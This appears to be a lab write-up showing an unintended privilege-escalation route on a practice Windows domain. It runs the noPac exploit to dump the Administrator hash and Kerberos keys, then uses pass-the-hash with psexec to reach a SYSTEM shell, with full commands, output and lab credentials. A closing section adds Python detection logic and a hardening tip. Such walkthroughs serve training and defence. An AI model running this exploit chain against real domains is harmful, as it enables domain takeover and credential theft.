Priv Esc Unintended Route

*Evil-WinRM* PS C:\Users\enox> ls Desktop


    Directory: C:\Users\enox\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/20/2021   4:12 AM                application
-a----        8/29/2024   3:31 AM             34 local.txt
-a----        5/27/2021   7:03 AM            239 todo.txt
*Evil-WinRM* PS C:\Users\enox\Desktop> cd application
*Evil-WinRM* PS C:\Users\enox\Desktop\application> ls


    Directory: C:\Users\enox\Desktop\application


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/20/2021   4:12 AM                templates
-a----        5/26/2021   7:26 PM            927 app.py

*Evil-WinRM* PS C:\Users\enox\Desktop\application> download app.py
                                        
Info: Downloading C:\Users\enox\Desktop\application\app.py to app.py
$ netexec smb 192.168.241.165 -u enox -p california -M nopac 
$ echo 192.168.241.165 DC01 heist.offsec DC01.heist.offsec | sudo tee -a /etc/hosts
$ python noPac.py heist.offsec/enox:california -dc-ip 192.168.241.165 -dc-host DC01 --impersonate Administrator -dump -just-dc-user Administrator -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target DC01.heist.offsec
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-1INBA7FFXVS$"
[*] MachineAccount "WIN-1INBA7FFXVS$" password = WXlyzE%)3WZm
[*] Successfully added machine account WIN-1INBA7FFXVS$ with password WXlyzE%)3WZm.
[*] WIN-1INBA7FFXVS$ object = CN=WIN-1INBA7FFXVS,CN=Computers,DC=heist,DC=offsec
[*] WIN-1INBA7FFXVS$ sAMAccountName == DC01
[*] Saving a DC's ticket in DC01.ccache
[*] Reseting the machine account to WIN-1INBA7FFXVS$
[*] Restored WIN-1INBA7FFXVS$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_DC01.heist.offsec.ccache
[*] Attempting to del a computer with the name: WIN-1INBA7FFXVS$
[-] Delete computer WIN-1INBA7FFXVS$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b325100ee400c16d56c42f9685381139:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d4e135e862ea6eae8575861230af84537d6dfa12720e328644822c20b2e911bf
Administrator:aes128-cts-hmac-sha1-96:8a9270d02cbbf911389a41b84af0cc5c
Administrator:des-cbc-md5:f84ae602a7c776b9
[*] Cleaning up... 
$ impacket-psexec administrator@192.168.241.165 -hashes :b325100ee400c16d56c42f9685381139
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Requesting shares on 192.168.241.165.....
[*] Found writable share ADMIN$
[*] Uploading file bboxsecA.exe
[*] Opening SVCManager on 192.168.241.165.....
[*] Creating service kijW on 192.168.241.165.....
[*] Starting service kijW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
DC01
nt authority\system
85d080fc22be19102c6e513f40686380

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::bc21:839e:775:80d3%7
   IPv4 Address. . . . . . . . . . . : 192.168.241.165
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254

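The noPac run above leaves a distinctive trail on the DC: a computer account is created (Security event 4741) and then renamed (4781) to the DC's own sAMAccountName without the trailing `$`, before being renamed back. The following detection logic is an added example, not part of the original notes; the event records are constructed to mirror this run (field names follow the Security log data names, timestamps and the benign `helpdesk` rename are invented), and `detect_nopac` correlates the rename with a recent 4741 by the same subject.

```python
"""Flag the noPac 'create computer account, rename it to the DC' pattern in Security events."""
from datetime import datetime, timedelta

# Constructed sample events mirroring the noPac run on heist.offsec (times are invented).
SAMPLE_EVENTS = [
    {"EventID": 4741, "Time": "2024-08-29T03:40:01", "SubjectUserName": "enox",
     "TargetUserName": "WIN-1INBA7FFXVS$"},                      # machine account added
    {"EventID": 4781, "Time": "2024-08-29T03:40:02", "SubjectUserName": "enox",
     "OldTargetUserName": "WIN-1INBA7FFXVS$", "NewTargetUserName": "DC01"},  # renamed to DC
    {"EventID": 4781, "Time": "2024-08-29T03:40:05", "SubjectUserName": "enox",
     "OldTargetUserName": "DC01", "NewTargetUserName": "WIN-1INBA7FFXVS$"},  # restored
    {"EventID": 4781, "Time": "2024-08-29T09:00:00", "SubjectUserName": "helpdesk",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},  # benign workstation rename
]


def _ts(value):
    return datetime.fromisoformat(value)


def detect_nopac(events, dc_names, window=timedelta(minutes=10)):
    """Return alerts for 4781 renames where a computer account (old name ends in '$')
    loses its '$' or takes a DC's sAMAccountName. An alert is 'high' when the renamed
    account was created by the same subject within `window` (event 4741), which is the
    create-then-rename shape of noPac; otherwise 'medium' for analyst review."""
    dc_names = {n.upper().rstrip("$") for n in dc_names}
    created = {}  # (subject, account name) -> creation time taken from 4741
    alerts = []
    for ev in sorted(events, key=lambda e: _ts(e["Time"])):
        if ev["EventID"] == 4741:
            created[(ev["SubjectUserName"], ev["TargetUserName"])] = _ts(ev["Time"])
        elif ev["EventID"] == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            dropped_dollar = old.endswith("$") and not new.endswith("$")
            targets_dc = new.upper().rstrip("$") in dc_names
            if not (dropped_dollar or targets_dc):
                continue  # ordinary computer rename: '$' kept, no DC name involved
            made = created.get((ev["SubjectUserName"], old))
            recent = made is not None and _ts(ev["Time"]) - made <= window
            alerts.append({"subject": ev["SubjectUserName"], "old": old, "new": new,
                           "targets_dc": targets_dc, "created_recently": recent,
                           "severity": "high" if (targets_dc and recent) else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect_nopac(SAMPLE_EVENTS, ["DC01$"]):
        print(alert)
```

The restore rename (DC01 back to WIN-1INBA7FFXVS$) and the benign WS01$ rename produce no alert, so only the impersonation rename surfaces; lowering ms-DS-MachineAccountQuota from the default 10 (shown in the noPac output) to 0 removes the 4741 step for ordinary users entirely.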